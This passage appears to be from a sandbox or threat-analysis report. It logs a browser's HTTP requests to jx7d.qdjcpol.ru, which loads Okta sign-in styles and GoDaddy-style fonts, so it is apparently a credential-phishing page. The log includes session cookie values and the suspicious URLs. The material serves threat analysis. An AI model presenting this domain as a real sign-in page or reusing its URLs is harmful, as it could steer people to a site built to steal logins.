                Source: global trafficHTTP traffic detected: GET /WpB8P/ HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://jx7d.qdjcpol.ru/WpB8P/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5vVWNhZGxzMU1kazdaOU5HSkRFWWc9PSIsInZhbHVlIjoiYkVkYjZYUHBGa0duaU92eGp1bStlUEpOUmpuOGpxclRWeVlOZkNiMTkvNkpnZGxPN0tpN21NdmxWSUR2eXEyS3NZOGY3QWtKdWt3MDhGVytDQXRQWVF1Z2twakVtdDRqRHN0UFAxTmVVV0d6MkIyNHpwWFBMS2U5Y2VnL29pRmQiLCJtYWMiOiIxZjljZTUwOGZiNzc4ZjdhZWQyYTkxZTIxYzY1MWIyOGZlMmM2MjU4ZTY2OGE0ZThkMmE1Zjk2OWZkYzA2NDkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImtPcjQ5bFgxdW5kQ2lwRzQyR0xEdEE9PSIsInZhbHVlIjoiY0VSZ1VQaklKVTl4Y09XMFB2Vkp0cE5reVhCaXpSTDNHcWVFdzIyUWRGL09yYnVLMk1MQjlTc1YxblhjVTFuUlFwdEtSTE5PRnpsZGRRbzFKL0VQWllINzRzYmFwVk9aWTRxYnl4OFNvSkJYT0dSdjJzVlFzclpIT25saWtBQjciLCJtYWMiOiI4MGFmNGVlZjdjYmU1ZjAxMzY0ZmFhNzgxZjczN2QwZWE4MTNiZGRlMzJkOWE2YTI4YmJhNDdiMmIyZjg5NTRjIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /yvXjoYkmQFZJWf6TvRNY1h HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5vVWNhZGxzMU1kazdaOU5HSkRFWWc9PSIsInZhbHVlIjoiYkVkYjZYUHBGa0duaU92eGp1bStlUEpOUmpuOGpxclRWeVlOZkNiMTkvNkpnZGxPN0tpN21NdmxWSUR2eXEyS3NZOGY3QWtKdWt3MDhGVytDQXRQWVF1Z2twakVtdDRqRHN0UFAxTmVVV0d6MkIyNHpwWFBMS2U5Y2VnL29pRmQiLCJtYWMiOiIxZjljZTUwOGZiNzc4ZjdhZWQyYTkxZTIxYzY1MWIyOGZlMmM2MjU4ZTY2OGE0ZThkMmE1Zjk2OWZkYzA2NDkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImtPcjQ5bFgxdW5kQ2lwRzQyR0xEdEE9PSIsInZhbHVlIjoiY0VSZ1VQaklKVTl4Y09XMFB2Vkp0cE5reVhCaXpSTDNHcWVFdzIyUWRGL09yYnVLMk1MQjlTc1YxblhjVTFuUlFwdEtSTE5PRnpsZGRRbzFKL0VQWllINzRzYmFwVk9aWTRxYnl4OFNvSkJYT0dSdjJzVlFzclpIT25saWtBQjciLCJtYWMiOiI4MGFmNGVlZjdjYmU1ZjAxMzY0ZmFhNzgxZjczN2QwZWE4MTNiZGRlMzJkOWE2YTI4YmJhNDdiMmIyZjg5NTRjIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/WpB8P/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik1Eekc0bk1mczdkdGt3UFEvMjZxamc9PSIsInZhbHVlIjoiZEsxOEt5d3ZZazZjbHpFTUlvSEc1OWVqWTJYakZIWXE4SW1nK0MyTVdORTJ1NmpMbEx4TG40ajNzc0dROW9RSG5GTjlRbm9pQXREYWV2U2xXQ0s3RERqbGRQT3lMejdaUjN0Ni8zRjJOOUtiMHVkVUVtUVkzbVoyOUpUcDRRZjgiLCJtYWMiOiJhYzc4MTE0NDdmM2Y0MmQxMTEwZGYyNmQwNDdhMmU4OTYwYmU2Mzc4MTA3N2U1NTY1OGIzNDBmNzY2ZGQ5YWFmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjRYZmpjTEFCbXdUbWlwSHBXcXVNWXc9PSIsInZhbHVlIjoiU01FeDVzOEoza0R0cndQUERiL0tMQ3hOdnROeFZHRG5LSnRzR3JNb2RRTDUwSzZuZnNDajdFTEZGY0ZjZ1ZvSXVCa3BkNXNuVHNwTU9kTFNka3VvQUxzWHA3aUx1WEk3YWVkSGM4QUdvS2lrZGN0VkZGTGVOSWVXMW9MUS9SdE8iLCJtYWMiOiIyYmQ3OTQzOThlOGMyNGY0OWM3Mzg3OTJlYTBkM2FjNTM4YjgxODg0ODBiNTM5NjAyYzAxMGFmOGQwYzJhNWVkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xyGLXSn2E19C5lrK3XtkQ6hGT9tgiX03Dfw HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpPVS9HRXhCTExLVjJJNmtVWm01VlE9PSIsInZhbHVlIjoidVM0WTdhNlRVM2Zod3V5dmU3ME1UaEdNeFp3NDR3a2txeXJFeGVZWE9sY1l4aFNVc01XSVMxSnUxd3F0cDBKbTAxSGg2bytQSm1wYUVlUHZpYjBXUFFEUTJ1bWN5dHpYV0pnL1NScXUxYVJmV1dWM3JVaHRpSGJpVmcybERac3AiLCJtYWMiOiI4NGNlODhlMzExMzEwMjUxYmE3ZWI2YTBlZmFlZDEwNmQ3MGRlNTlmMDhhODkxMGZhNmEwNjk0NTBhMGY5NDYxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii94cWtQUWh3YlczWUMrektsRCtnS2c9PSIsInZhbHVlIjoiTVZsbW5DM3gycm84bjJ6eXg0Vys0RGZ3SjgwNkZ6WlJ0cnFCeW11c2wvWHI4MzF3YXprY1JYU0tycnlWaTNBTGhYZUtGZlZwY1BoZjRIZG9pbXVqVFFXSDh1UnNNNktRZTBVNlQ2NitCNjdGMXpGVC95d2ltM3FhYTRPamh2ZTkiLCJtYWMiOiJkZTBlZDkxYzVmZGIzNDA0ODUyMjQ3ZjI1M2M2MDJhOWFmNzdlZDczYTRhYjE5ZjRiNDYxZDUxMDZjOTZhZGQ0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFK HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://jx7d.qdjcpol.ru/WpB8P/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpPVS9HRXhCTExLVjJJNmtVWm01VlE9PSIsInZhbHVlIjoidVM0WTdhNlRVM2Zod3V5dmU3ME1UaEdNeFp3NDR3a2txeXJFeGVZWE9sY1l4aFNVc01XSVMxSnUxd3F0cDBKbTAxSGg2bytQSm1wYUVlUHZpYjBXUFFEUTJ1bWN5dHpYV0pnL1NScXUxYVJmV1dWM3JVaHRpSGJpVmcybERac3AiLCJtYWMiOiI4NGNlODhlMzExMzEwMjUxYmE3ZWI2YTBlZmFlZDEwNmQ3MGRlNTlmMDhhODkxMGZhNmEwNjk0NTBhMGY5NDYxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii94cWtQUWh3YlczWUMrektsRCtnS2c9PSIsInZhbHVlIjoiTVZsbW5DM3gycm84bjJ6eXg0Vys0RGZ3SjgwNkZ6WlJ0cnFCeW11c2wvWHI4MzF3YXprY1JYU0tycnlWaTNBTGhYZUtGZlZwY1BoZjRIZG9pbXVqVFFXSDh1UnNNNktRZTBVNlQ2NitCNjdGMXpGVC95d2ltM3FhYTRPamh2ZTkiLCJtYWMiOiJkZTBlZDkxYzVmZGIzNDA0ODUyMjQ3ZjI1M2M2MDJhOWFmNzdlZDczYTRhYjE5ZjRiNDYxZDUxMDZjOTZhZGQ0IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /560ZS9mOYZWpzpxydDyD8920 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ab0AixXB22vfIpqWn0cd30 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250319%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250319T094719Z&X-Amz-Expires=300&X-Amz-Signature=b954c13fbd471219076f466be3a670f9689baefc72b9990946bf12b7565cd328&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 